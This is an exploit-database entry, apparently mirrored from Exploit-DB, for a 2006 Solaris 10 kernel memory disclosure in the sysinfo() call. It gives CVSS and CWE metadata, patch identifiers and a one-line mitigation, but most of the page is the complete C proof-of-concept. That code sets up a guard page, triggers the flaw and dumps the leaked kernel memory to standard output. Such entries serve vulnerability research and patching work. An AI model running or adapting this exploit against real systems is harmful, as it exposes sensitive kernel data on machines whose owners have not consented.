header-logo
Suggest Exploit
vendor:
Solaris
by:
qaaz
7.5
CVSS
HIGH
Kernel Memory Disclosure
200
CWE
Product Name: Solaris
Affected Version From: Solaris 10 without patch 118833-09 (SPARC) or 118855-06 (x86)
Affected Version To:
Patch Exists: NO
Related CWE:
CPE: o:sun:solaris:10
Metasploit:
Other Scripts:
Platforms Tested: Solaris
2006

Solaris sysinfo Kernel Memory Disclosure

This exploit allows an attacker to disclose kernel memory information on Solaris systems. It takes advantage of a vulnerability in the sysinfo() function, which can be used to obtain sensitive system information. By exploiting this vulnerability, an attacker can retrieve kernel memory contents, potentially exposing sensitive data.

Mitigation:

Apply the latest security patches provided by the vendor. Ensure that the system is running the latest version of Solaris with all necessary updates.
Source

Exploit-DB raw data:

/* 07/2006: public release
 * SPARC Solaris 10 without 118833-09
 * x86   Solaris 10 without 118855-06
 *
 * Solaris sysinfo Kernel Memory Disclosure
 * By qaaz
 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/systeminfo.h>

#define PAGE_COUNT	1000

int	main(int argc, char *argv[])
{
	char	*buf, *end;
	int	pg = PAGE_COUNT, pagesz, bufsz;

	fprintf(stderr,
		"---------------------------------\n"
		" Solaris sysinfo Kmem Disclosure\n"
		" By qaaz\n"
		"---------------------------------\n");

	if (argc > 1) pg = atoi(argv[1]);

	pagesz = getpagesize();

	bufsz = (pg + 1) * pagesz;
	if (!(buf = memalign(pagesz, bufsz))) {
		perror("malloc");
		return -1;
	}

	memset(buf, 0, bufsz);
	end = buf + (pg * pagesz);

	fprintf(stderr, "-> [ %p .. %p ]\n", buf, end);
	fflush(stderr);

	if (mprotect(end, pagesz, PROT_NONE)) {
		perror("mprotect");
		return -1;
	}

	sysinfo(SI_SYSNAME, buf, 0);

	while (end > buf && end[-1] == 0)
		end--;
	fprintf(stderr, "== %d\n", (int) (end - buf));
	fflush(stderr);

	if (!isatty(1))
		write(1, buf, (size_t) (end - buf));
	return 0;
}

// milw0rm.com [2007-09-01]